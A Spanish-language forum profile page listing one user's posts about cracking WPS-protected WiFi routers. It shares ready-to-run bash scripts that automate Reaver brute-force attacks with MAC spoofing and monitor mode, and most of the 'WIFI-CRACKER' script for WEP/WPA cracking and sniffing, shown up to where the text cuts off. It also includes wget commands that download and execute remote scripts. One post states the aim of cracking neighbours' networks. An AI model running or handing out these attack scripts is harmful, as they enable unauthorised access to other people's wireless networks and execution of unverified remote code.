Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - P4nd3m0n1um

#481
NUEVA VERSIÓN: WPSCrackGUI v1.2.0 -Beta-

- Nueva Herramienta PINCheck v1.0.
- Nuevo Diccionario 5000-9000 y Continuar.
- Base de datos de PIN's: #250.

wget http://nchc.dl.sourceforge.net/project/wpscrackgui/Beta/WPSCrackGUIv1.2.0beta.gambas
sudo chmod 777 WPSCrackGUIv1.2.0beta.gambas
sudo ./WPSCrackGUIv1.2.0beta.gambas
#482
Antes que todo se instalan los Compat-Wireless segun el kernel, se parchean y luego se instalan los programas, mirate este hilo: http://www.arg-wireless.com.ar/index.php/topic,995.msg4187.html#msg4187
#483
Wireless en Linux / Re: Más dudas sobre WPA y WPS
11 Noviembre 2012, 04:47 AM
Deberías haberlo posteado en el hilo correspondiente.

1.- Reaver-WPS es el que hace todo el trabajo, WPSCrackGUI, Infator, Reaver-PRO, etc. son simplemente entornos gráficos agradables para el usuario con extras.
2.- Depende del Router.
3.- Puede tardar una eternidad!
4.- Donde quieras, por lo generar prefiero usar un linux a mi medida.
5.- Únicamente por diccionario WPA.
#484
He encontrado dos scripts bash que todos pueden utilizar. Uno es de j0k3rr1 otro es de Vinay Gopinath y finalmente, el último es de hackling de Hak5 foros. Simplemente pegue el código en Ubuntu o Backtrack en un nuevo documento y guardarlo como un archivo. Sh. Entonces chmod 755 el archivo y ejecutarlo.

j0k3rr1

#!/bin/bash
# This is a linux bash script i wrote that runs best on Backtrack 5 KDE
# It automates reaver WPS bruteforce attack. simply save it to a text file (remove the .txt extension make #it .sh)
# then chmod +x <thefilename> and run it ./<filename>
# enjoy

# Attack WPS enabled routers

clear
tput setaf 2; echo "##################################################################################"
tput setaf 2; echo "#          ~Automate reaver WPS attack Bash script written by j0k3rr~            #"
tput setaf 2; echo "#    1-Tested on Backtrack 5 KDE                                                #"
tput setaf 2; echo "#    2-Make sure your wifi card is plugged in before starting the script        #"
tput setaf 2; echo "#    3-Any problems with the script feel free to contact me on twitter @j0k3rr1  #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "##################################################################################"


tput setaf 1; read -p "Press [Enter] to start hacking..."

clear
tput setaf 1; ifconfig | grep "wlan"
# Select your Wireless Interface ( wlan0 , wlan1, wlan2 )

tput setaf 2; read -p "Whats your Wireless interface? (Should be listed in red above) " winterface

# increase TX power to 30 dBm for wifi cards that can hanlde the shiznit

tput setaf 2; echo "Would you like to increase the TX Power of your wireless card to 30 dBm? Y/n"
read a
if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
        iw reg set BO
        iwconfig $winterface txpower 30
      else
      echo "continuing without changing the TX power"
fi

# Spoof Mac Address and put card into monitor mode
tput setaf 2; echo -e "Would you like to spoof the MAC address of your wifi card? Y/n"

read b
if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
        wmac=00:11:22:33:44:55
        airmon-ng stop $winterface
        ifconfig $winterface down
        macchanger --mac 00:11:22:33:44:55 $winterface
        ifconfig $winterface up
        tput setaf 1; airmon-ng start $winterface
        else
        tput setaf 1; echo "continuing without changing the mac address"
        tput setaf 1; airmon-ng start $winterface
fi


tput setaf 2; read -p "Whats the monitor mode interface? (Usually mon0) " minterface

# Start airodump-ng to monitor the airwaves.
clear
tput setaf 1; echo  "About to start monitoring the air! "
sleep 3
konsole --hold -e wash -i $minterface
sleep 5
# Prompt user for Targets BSSID #

tput setaf 2; echo "Input the WPS enabled access points details: "
tput setaf 1; read -p "BSSID: " xBSSID
tput setaf 1; read -p "Channel number: " xCH
# Attack the Access point

konsole --hold -e reaver -i $minterface  -c $xCH -b $xBSSID -vv &

# End

clear
tput setaf 2; echo "[+] Process Started:"
tput setaf 2; echo "[+] Attacking " $xBSSID "on channel " $xCH " Goodluck and Happy Cracking"
wait


Hackling

#!/bin/bash
clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read setup
if [[ $setup == 'y' ]]; then
#Setup the monitor interface
echo "[+] What Wireless interfaces do we have..."
iwconfig
echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
read interface
if [[ $interface == '' ]]; then
interface=wlan0 #Default to wlan0
fi
echo "[+] Starting monitor Mode for $interface"
airmon-ng start $interface
iwconfig
fi #End Mon Mode Setup Portion
#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read monInterface
if [[ $monInterface == '' ]]; then
monInterface=mon0 #Default to mon0
fi
#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig $monInterface down
macchanger -r $monInterface
ifconfig $monInterface up
#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i $monInterface
#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read target
#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
read reaverVars
#Start REAVERINGGGGG!!!!
echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
reaver -i $monInterface -b $target $reaverVars
#Stop Monitor Mode Interface if the script set it up
if [[ $setup == 'y' ]]; then
echo ""
echo "[+] killing Monitor Interface"
airmon-ng stop $monInterface
fi


Vinay Gopinath

#! /bin/bash
#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012

#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)
wireless_interface=wlan0

#The timeout (in seconds) for wash to search for WPS-enabled access points
wash_timeout=15

#Flag to allow user to choose target AP
allow_user_choice=1

#Delay between attack attempts
reaver_delay=0

#Check for root privileges
if (( EUID != 0 )); then
  echo "This script needs root"
  exit 1
fi

#Check for required commands
for command in airmon-ng wash reaver
do
  if [[ -z $(which $command) ]]; then
     echo "$command was not found"
     echo "To install $command, you may follow this link"
     echo "http://lmgtfy.com/?q=$command+installation"
     exit 1
  fi
done

echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"

#Check available interfaces and close previous monitor interfaces and wireless lan
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
do
  if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
    echo "* Shutting down $interface"
    airmon-ng stop $interface > /dev/null
  fi
done

echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null

echo "Identifying WPS-enabled access points"
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')

if [[ -n $(echo $APs) ]]; then
   if  (( $allow_user_choice )); then
      n=1
      echo "The following access points were detected"
      for ap in $APs
      do
        echo "* $n: $ap"
        ((n++))
      done
      read -p "Enter your choice: " choice
      if [[ $choice -le $n ]]; then
        chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
echo "You have chosen $chosen_ap"
      else
echo "Invalid choice!"
exit 1
      fi
   else
      chosen_ap=$(echo "${APs}" | head -n1)
      echo "Proceeding with choice 1: $chosen_ap"
   fi
   tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
   rm washOutput.txt
   channel=$(echo $tempLine | cut -f2 -d' ')
   mac_address=$(echo $tempLine | cut -f1 -d' ')
   echo "Starting reaver"
   echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
   echo "AP name: $chosen_ap"
   echo "Channel: $channel"
   echo "MAC Address: $mac_address"
   reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
else
   echo "No networks found. Consider increasing the wash timeout. Terminating"
   exit 1
fi
#485
Wireless en Linux / Wifi-Cracker v1.2.2
11 Noviembre 2012, 04:31 AM
WIFI-Cracker es un script que automatiza la AUDITORIA de las redes wifi. Está completamente creado por Mr. Penguin, de hecho lo hice hoy.

Es una prueba de concepto y se creó con fines educativos (ya que yo estaba aprendiendo sobre wifi).
Tengo la intención de hacer mucho más de agrietamiento WIFI de tu vecino porque honestamente que es fácil para mí ahora.
En la actualidad, quiero añadir algunas opciones más craqueo a la escritura, así como un menú Dauth. Te agradecería si alguien quiere contribuir en este proyecto.

Características
- Mac Spoofing con macchanger
- Target exploración con airodump-ng
- Cracking WEP y WPA / 2 (con aircrack-ng y reaver)
- Menú Depurar para corregir errores
- Un montón de cosas pequeñas para que el guión tan bueno como se puede ser Packet sniffing menú con tshark y Wireshark * NUEVO *
- Updater función * NUEVO *
- Continuar sesión anterior WPA hackear * NUEVO *

Actualización 2: v1.2.2 está en marcha con un montón de correcciones desde 1,2 y la posibilidad de reanudar las sesiones de Reaver.

ACTUALIZACIÓN: Esta es la nueva versión 1.2 WIFI-CRACKER donde muchas cosas se han solucionado y ha añadido unos cuantos. Las nuevas funciones incluyen una actualización y un menú de detección de paquetes. Enlace de descarga Igual que antes, y no necesitará nunca físicamente usarlo nunca más.

Más info @Hak5 y el crédito va a root920: http://goo.gl/FRKza

Source:

#!/bin/bash
#The current function to check for internet connection might be wrong sometimes, I'll try to find a better one. You can help by emailing @ andr920jhckrs+WIFICRACKER@gmail.com
# READ ABOUT FUNCTION!!!!!!
#~~~~~~~~~~~~~~~~~~~~ERROR CODES~~~~~~~~~~~~~~~~~
#EXIT 1 = not root
#EXIT 2 = dependencies
#EXIT 3 = after update
#EXIT 4 = normal exit, script over
#EXIT 5 = used quit
#EXIT ? = UNKNOWN ERROR PLEASE REPORT!!!
#======================================= VARIABLES =======================================#
#Colors for error message
RED='\033[0;41;30m'
STD='\033[0;0;39m'
#Variables
INTERFACE="wlan0"
BSSID="00:BB:CC:DD:EE:FF"
CHANNEL="7"
MAC="00:11:22:33:44:55"
CMAC="USED FOR CURRENT MAC"
INTERFACE2="mon0"
FILE="wifi-cracker"
ESSID="linksys"
MONMODE="OFF"
MACINFO="OFF"
MACMODE="OFF"
MACOPTION="m ${MAC}"
AIREPLAYPID="NOT RUNNING"
AIRODUMPPID="NOT RUNNING"
TERMINAL="gnome-terminal"
TERMCMD="USED BY TERMINAL COMMANDS"
KEY="NOTHING SAVED"
FILE2="tshark-output"
WIFICONNECTION="USED BY UPDATE FUNCTION"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! FUNCTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! DEBUGING STUFF !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
debug() {
while true
do
show_logo
get_mac
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo " D E B U G - M E N U"
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo ""
echo "Please choose an option"
echo " 1.        Change Variables"
echo " 2.        Update Current Mac (${CMAC})"
echo " 3.        CLEAN UP FILES"
echo " 4.        Use Terminal Commands"
echo " 5.        Check airmon-ng"
echo " 6.        Check iwconfig"
echo " 7.        Check ifconfig"
echo " 8.        Check macchanger"
echo " 9. *MENU* Exit to main menu"
echo "10.        Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 10 ] " choice
case $choice in
1) changevar_menu ;;
2) get_mac ;;
3) clean_up ;;
4) read -p "MESSAGE: ENTER YOUR TERMINAL COMMAND here : " TERMCMD && ${TERMCMD} && pause ;;
5) echo "MESSAGE: VIEWING airmon-ng : " && airmon-ng && pause ;;
6) echo "MESSAGE: VIEWING iwconfig : " && iwconfig && pause ;;
7) echo "MESSAGE: VIEWING ifconfig : " && ifconfig && pause ;;
8) echo "MESSAGE: VIEWING macchanger -s : " && macchanger -s ${INTERFACE} && pause ;;
9) main_menu ;;
10) f_exit ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
changevar_menu() {
while true
do
show_logo
get_mac
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo " DEBUG MENU -> VARIABLES"
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo "Those are most of the variables of this script!"
echo "most because there are local variables (CHOICE;CONFIRM;COMMAND;WIFI)"
echo "DON'T MESS WITH THOSE UNLESS REALLY NEED TO!"
echo ""
echo " 1. *MENU* Back to debug"
echo " 2. *MENU* Exit to main menu"
echo " 3.        EXIT WIFI-CRACKER"
echo "Chose an option to change the variable"
echo " 4. Primary interface : ${INTERFACE}"
echo " 5. Target BSSID   : ${BSSID}"
echo " 6. Target Channel : ${CHANNEL}"
echo " 7. Desired MAC    : ${MAC}"
echo " 8. Current MAC    : ${CMAC}"
echo " 9. Monitor interface : ${INTERFACE2}"
echo "10. Save filename  : ${FILE}"
echo "11. Target ESSID   : ${ESSID}"
echo "12. Monitor Mode   : ${MONMODE}"
echo "13. MAC INFO mode  : ${MACINFO}"
echo "14. MAC Spoof mode : ${MACMODE}"
echo "15. Macchanger option : ${MACOPTION}"
echo "16. Aireplay PID   : ${AIREPLAYPID}"
echo "17. Airodump PID   : ${AIRODUMPPID}"
echo "18. Your terminal  : ${TERMINAL}"
echo "19. Variable TERMCMD : ${TERMCMD}"
echo "20. WIFI KEY               : ${KEY}"
echo "21. Tshark output name: ${FILE2}"
echo "22. Wifi Connection : ${WIFICONNECTION}"
echo ""
echo "Variable RED : ${RED}"
echo "Variable STD : ${STD}"
echo ""
echo "Script Argument 1 : ${1}"
echo "Script Argument 2 : ${2}"
echo "Script Argument 3 : ${3}"
echo "Script Argument 4 : ${4}"
echo "Script Argument 5 : ${5}"
local choice
read -p "Enter choice [ 1 - 22 ] " choice
case $choice in
1) debug ;;
2) main_menu ;;
3) f_exit ;;
4) read -p "Enter new Variable here : " INTERFACE && pause ;;
5) read -p "Enter new Variable here : " BSSID && pause ;;
6) read -p "Enter new Variable here : " CHANNEL && pause ;;
7) read -p "Enter new Variable here : " MAC && pause ;;
8) read -p "Enter new Variable here : " CMAC && pause ;;
9) read -p "Enter new Variable here : " INTERFACE2 && pause ;;
10) read -p "Enter new Variable here : " FILE && pause ;;
11) read -p "Enter new Variable here : " ESSID && pause ;;
12) read -p "Enter new Variable here : " MONMODE && pause ;;
13) read -p "Enter new Variable here : " MACINFO && pause ;;
14) read -p "Enter new Variable here : " MACMODE && pause ;;
15) read -p "Enter new Variable here : " MACOPTION && pause ;;
16) read -p "Enter new Variable here : " AIREPLAYPID && pause ;;
17) read -p "Enter new Variable here : " AIRODUMPPID && pause ;;
18) read -p "Enter new Variable here : " TERMINAL && pause ;;
19) read -p "Enter new Variable here : " TERMCMD && pause ;;
20) read -p "Enter new Variable here : " KEY && pause ;;
21) read -p "Enter new Variable here : " FILE2 && pause ;;
21) read -p "Enter new Variable here : " WIFICONNECTION && pause ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
check_internet() {
local WIFI
WIFI=`ifconfig wlan0 | grep -n Bcast`
case ${WIFI} in
"") WIFICONNECTION="OFF" ;;
*) WIFICONNECTION="ON"
esac
case ${WIFICONNECTION} in
"ON") echo "MESSAGE: WIFI/INTERNET APPARENTLY CONNECTED!";;
"OFF")echo "MESSAGE: YOU MUST BE CONNECTED TO THE INTERNET FOR THIS TO WORK!" & sleep 5 & main_menu ;;
*) echo -e "${RED}Error...${STD}" && sleep 2
esac
}
###########################################################################################
clean_up() {
local CONFIRM
read -p "Would you like WIFI-CRACKER to clean up it's files [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
show_logo &
echo "CLEANING UP..." &
kill ${AIRODUMPPID} &
kill ${AIREPLAYPID} &
rm *.ivs *.cap *.xor *.wpc &
reset_mac &
echo "CLEANING UP...DONE" &
sleep 3 ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, CONTINUING...${STD}" && sleep 2
esac
local CONFIRM
read -p "Would you like WIFI-CRACKER to delete dependencies [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
show_logo &
echo "DELETING DEPENDENCIES..." &
apt-get remove aircrack-ng macchanger reaver tshark wireshark &
echo "DELETING DEPENDENCIES...DONE" &
sleep 3 ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, CONTINUING...${STD}" && sleep 2
esac
}
###########################################################################################
pause(){
echo ""
echo ""
read -p "Press [Enter] key to continue..." fackEnterKey
clear
}
###########################################################################################
f_exit(){
clean_up
show_logo
echo "############################################################################"
echo "#########################NOW EXITING WIFI-CRACKER###########################"
echo "############################################################################"
echo ""
echo "reseting wireless interface."
ifconfig ${INTERFACE} down
echo "reseting wireless interface.."
ifconfig ${INTERFACE} up
echo "reseting wireless interface...DONE!"
echo ""
echo "IF YOUR WIFI STOPPED WORKING, TURN IT OFF THEN BACK ON"
pause
if [ `echo -n $USER` != "root" ]
then
exit 1
fi
if [ -z `which macchanger` ] || [ -z `which aircrack-ng` ] || [ -z `which reaver` ] || [ -z `which ${TERMINAL}` ]
then
exit 2
fi
exit 4
}
###########################################################################################
#=========================================================================================#
###########################################################################################
show_logo() {
clear
echo " ___________________________________________________________________________"
echo "| _ _ ___________ _____ AUTHOR ___________ ___ _____ _ _____________ |"
echo "|| | | |_ _| ___|_ _| root / __ \ ___ \/ _ \/ __ \ | / / ___| ___ \|"
echo "|| | | | | | | |_ | | ______ | / \/ |_/ / /_\ \ / \/ |/ /| |__ | |_/ /|"
echo "|| |/\| | | | | _| | ||______|| | | /| _ | | | \| __|| / |"
echo "|\ /\ /_| |_| | _| |_      | \__/\ |\ \| | | | \__/\ |\ \ |___| |\ \ |"
echo "| \/ \/ \___/\_| \___/*v1.2.2*\____|_| \_\_| |_/\____|_| \_|____/\_| \_||"
echo "|___________________________________________________________________________|"
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! START UP FUNCTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
check_root() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo ""
echo "#################################################################"
echo "#######################CHECKING FOR ROOT#########################"
echo "#################################################################"
echo ""
if [ `echo -n $USER` != "root" ]
then
while true
do
echo "MESSAGE: ERROR: Please run as root!"
echo "You can either exit and run again through sudo ./filename.sh"
echo "Or type 1 and WIFI-CRACKER WILL REQUEST ROOT (by sudo -s)"
echo ""
echo "1. Attempt to get root"
echo "2. Exit WIFI-CRACKER"
echo ""
local choice
read -p "Enter choice [ 1 - 2 ] " choice
case $choice in
1) echo "Type your password (check the code if your afraid it's logged)" && echo "Run the script again" && echo "" && sudo -s ;;
2) f_exit ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear ;;
esac
done
fi
echo "MESSAGE: root access level confirmed!"
pause
}
###########################################################################################
check_dep() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo "root...............VERIFIED!"
echo ""
echo "#################################################################"
echo "######################CHECKING DEPENDENCIES######################"
echo "#############currently aircrack-ng;macchanger;reaver#############"
echo "#################################################################"
echo ""
if [ -z `which xterm` ] || [ -z `which gnome-terminal` ]
then
while true
do
echo "Which terminal do you prefer?"
echo "1. Gnome-terminal"
echo "2. XTerm"
echo "3. Enter your own terminal name"
local choice
read -p "Enter choice [ 1 - 3 ] " choice
case $choice in
1) TERMINAL="gnome-terminal" ;;
2) TERMINAL="xterm" ;;
3) read -p "Which one do you have? " ;;
*) echo "MESSAGE: YOU MUST CHOOSE A TERMINAL TO USE!" ;;
esac
local CONFIRM
echo "You choose this terminal for WIFI-CRACKER : ${TERMINAL}"
read -p "Is this information corrent [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
*) echo "MESSAGE: Please re-enter information" ;;
esac
done
fi
echo ""
if [ -z `which macchanger` ] || [ -z `which aircrack-ng` ] || [ -z `which reaver` ] || [ -z `which tshark` ] || [ -z `which wireshark` ]
then echo "MESSAGE: One or more of the dependencies are not installed."
pause
local CONFIRM
read -p "Would you like WIFI-CRACKER to install them [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) check_internet && apt-get install aircrack-ng macchanger reaver tshark wireshark ${TERMINAL} && check_dep ;;
*) echo "MESSAGE: YOU MUST HAVE THE DEPENDENCIES FOR WIFI-CRACKER TO RUN!" && f_exit
esac
fi

echo "MESSAGE: Dependencies confirmed!"
pause
}
###########################################################################################
check_arg() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo "root...............VERIFIED!"
echo "dependencies.......VERIFIED!"
echo ""
echo "#################################################################"
echo "###############CHECKING IF AGRUMENTS WERE PROVIDED###############"
echo "#################################################################"
echo ""
if [ -z ${1} ] || [ -z ${2} ] || [ -z ${3} ] || [ -z ${4} ]
then
echo "MESSAGE: You haven't provided all arguments"
echo "MESSAGE: It's just another method of using this script"
echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel] [MAC]"
echo "MESSAGE: Example #`basename ${0}` wlan0"
echo "MESSAGE: If you see this, you will have to manually enter those later"
else
INTERFACE="`echo "${1}" `"
BSSID="`echo "${2}" `"
CHANNEL="`echo "${3}" `"
MAC="`echo "${4}" `"
echo "MESSAGE: You provided all the arguments"
echo "MESSAGE: Your primary interface is         : ${INTERFACE}"
echo "MESSAGE: Your Target BSSID is      : ${BSSID}"
echo "MESSAGE: Your Target channel is    : ${CHANNEL}"
echo "MESSAGE: Your desired MAC Address is       : ${MAC}"
MACINFO="ON"
fi
pause
}
###########################################################################################
last_stp_msg() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo "root...............VERIFIED!"
echo "dependencies.......VERIFIED!"
echo "script arguments...VERIFIED!"
get_mac
echo "current mac.......RETRIEVED!"
pause
}
###########################################################################################
about() {
show_logo
echo "I don't own the programs used in this script"
echo "(macchanger;aircrack-ng;reaver;tshark;wireshark)"
echo ""
echo "DISCLAIMER :"
echo "WIFI-CRACKER IS A SCRIPT DESIGNED TO AUTOMATE THE PROCESS OF CRACKING YOUR"
echo "WIRELESS NETWORK AND WAS CREATED FOR EDUCATIONNAL PURPOSES. I AM NOT IN ANY"
echo "WAY RESPONSIBLE FOR ANY CRIMES YOU COMMIT USING THIS SCRIPT!"
echo ""
echo "CHANGE LOG :"
# echo "*ALPHA-v0.1* ABILITY TO CHANGE MAC"
# echo "*ALPHA-v0.1* ABILITY TO SCOUT FOR TARGETS"
# echo "*ALPHA-v0.1* ABILITY TO CRACK A WEP PROTECTED NETWORK"
# echo "*ALPHA-v0.2* ORGANIZED IN FUNCTIONS, CLEAN UP CODE, NOW MENU DRIVEN"
# echo "*ALPHA-v0.3* SCOUTING MENU DONE; CRACKING MENU IN PROGRESS (+WPA)"
# echo "*ALPHA-v0.4* MAC SPOOF NOW HAS OPTIONS AND MENU"
# echo "*BETA -v0.5* CRACKING ALMOST DONE(+WEP PASSIVE); STARTED CLEANUP AND DEBUG"
# echo "*BETA -v0.6* ADDED ABOUT SCREEN; ADDED TERMINAL CHOICE"
# echo "*BETA -v0.7* CRACKING MENU(+CRACK FILE & AIRCRACK CONTROL)"
# echo "*BETA -v0.8* DEBUG MENU ALMOST COMPLETE; CAN CONTROL TERMINAL FROM DEBUG MENU"
# echo "*BETA -v0.9* CRACKING FINISHED (FRAGMENTATION ATTACK ADDED)"
# echo "*FINAL-v1.0* FINISHED DEBUG MENU; ADDED DOWNLOAD INFO"
echo "*v1.0* FIRST PUBLIC RELEASE"
echo "*v1.1* LOTS OF FIXES (TYPOS+CHECKS+etc.); OPTION TO ASK FOR ROOT"
echo "*v1.2* FIXES; ADDED PACKET SNIFFING MENU; ADDED UPDATE FUNCTION"
echo "*v1.2.1* FIXED MAJOR ISSUE WITH CRACKING FROM FILE METHODS AND SOME TYPOS"
echo "*v1.2.2* FIXED LOTS OF BUGS ; MADE WPA CRACKING BETTER ; ADDED CONTINUE REAVER SESSION"
echo "*TODO* FIX SCRIPT ARGUMENTS ; ADD BRUTE FORCE CRACK ; MAKE DAuth MENU"
echo ""
echo "ORIGINAL NAME : WIFI-CRACKER-by-root.sh"
echo "CURRENT NAME : `basename ${0}`"
echo "AUTHOR             : root/andr920"
echo "LATEST VERSION : v1.2.2"
echo "LAST RELEASE : Tue 07 Aug 2012 - 23:32"
echo ""
echo "You can always download the newest version of this script here:"
echo "http://dl.dropbox.com/u/34008580/WIFI-CRACKER-by-root.sh"
echo "OR use the built-in updater"
echo ""
echo "If you have any issues email me at : andr920jhckrs+WIFICRACKER@gmail.com"
pause
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! MAIN FUNCTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
start_up() {
trap '' SIGINT SIGQUIT SIGTSTP
echo "Traping exit keystrokes"
check_root
check_dep
check_arg
last_stp_msg
about
main_menu
}
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
main_menu() {
while true
do
show_logo
echo "~~~~~~~~~~~~~~~~~~~~~"
echo " M A I N - M E N U"
echo "~~~~~~~~~~~~~~~~~~~~~"
echo "Please choose an option"
echo "1. *MENU* Mac spoofer"
echo "2. *MENU* Target scouting"
echo "3. *MENU* Cracking         *SOON -> WEP CRACK METHOD 3 and BRUTE FORCE*"
echo "4. *MENU* Packet Sniffing *NEW*"
echo "5. *MENU* DAuth            *COMING SOON"
echo "6. UPDATE WIFI-CRACKER *NEW*"
echo "7.         Exit WIFI-CRACK"
echo ""
echo "~ for debug MENU"
echo ""
local choice
read -p "Enter choice [ 1 - 7 ] " choice
case $choice in
1) macspoof_info ;;
2) scout_menu ;;
3) crack_menu ;;
4) sniff_menu ;;
5) echo "" echo "DAuth menu (featuring some aireplay, airdrop and maybe mdk3) *COMING SOON*" && pause ;;
6) update ;;
7) f_exit;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
update() {
show_logo
echo "############################################################################"
echo "###########################UPDATING WIFI-CRACKER###########################"
echo "#################################using wget#################################"
echo "############################################################################"
check_internet
echo "update...downloading"
wget -O WIFI-CRACKER-by-root.sh http://dl.dropbox.com/u/34008580/WIFI-CRACKER-by-root.sh
echo "update...allowing to execute"
chmod +x WIFI-CRACKER-by-root.sh
echo "update...running"
./WIFI-CRACKER-by-root.sh
exit 3
}
#=========================================================================================#
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! MAC SPOOF OPTION !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
macspoof_info() {
show_logo
echo "############################################################################"
echo "#############################MAC SPOOFING START#############################"
echo "##############################using macchanger##############################"
echo "############################################################################"
echo ""
if [ ${MACINFO} != "ON" ]
then
while true
do
echo "MESSAGE: YOU MUST PROVIDE YOUR INTERFACE AND DESIRED MAC ADDRESS IN ORDER TO PROCEED"
change_mac
done
else
echo "MESSAGE: YOU HAVE ALREADY PROVIDED A MAC ADDRESS TO SPOOF"
pause
MACINFO="ON"
macspoof_menu
fi
}
###########################################################################################
get_mac() {
CMAC=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`
}
#==================================== OW LOOK A MENU =====================================#
macspoof_menu() {
while true
do
show_logo
get_mac
echo "~~~~~~~~~~~~~~~~~~~~~"
echo " MAC SPOOFING MENU"
echo "~~~~~~~~~~~~~~~~~~~~~"
echo "Your current MAC : ${CMAC}"
echo "Your desired MAC : ${MAC}"
echo "Is your MAC spoofed? (STATUS: ${MACMODE})"
echo "========================================="
echo "Please choose an option"
echo "1.         Change to Random vendor MAC"
echo "2.         Change to Fully random MAC"
echo "3.         Change to Desired MAC"
echo "4.         Reset MAC"
echo "5.         Change the desired MAC"
echo "6. *MENU* Go to scouting menu"
echo "7. *MENU* Go to cracking menu"
echo "8. *MENU* Exit to main menu"
echo "9.         Exit WIFI-CRACKER"
echo ""
local choice
read -p "Enter choice [ 1 - 9 ] " choice
case $choice in
1) MACOPTION="-A" && macspoof;;
2) MACOPTION="-r" && macspoof;;
3) MACOPTION="-m ${MAC}" && macspoof ;;
4) reset_mac ;;
5) change_mac ;;
6) scout_menu ;;
7) crack_menu ;;
8) main_menu ;;
9) f_exit;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
#=========================================================================================#
###########################################################################################
###########################################################################################
reset_mac() {
show_logo
echo "############################################################################"
echo "############################RESETING MAC ADDRESS############################"
echo "##############################using macchanger##############################"
echo "############################################################################"
echo "MAC reset is in progress."
off_mon
echo "MAC reset is in progress..bringing wireless interface down"
ifconfig ${INTERFACE} down
echo "MAC reset is in progress...applying changes with macchanger"
macchanger -p ${INTERFACE}
echo "MAC reset is in progress....bringing wireless back up"
ifconfig ${INTERFACE} up
echo "MAC reset is in progress.....DONE!"
MACMODE="OFF"
echo ""
sleep 3
}
###########################################################################################
###########################################################################################
change_mac() {
show_logo
echo "############################################################################"
echo "##########################CHANGING DESIRED MAC INFO#########################"
echo "##############################using macchanger##############################"
echo "############################################################################"
while true
do
read -p "WHAT IS YOUR PRIMARY INTERFACE ?? " INTERFACE
read -p "WHAT IS YOUR DESIRED MAC ADDRESS ?? " MAC
echo "MESSAGE: Your primary interface is         : ${INTERFACE}"
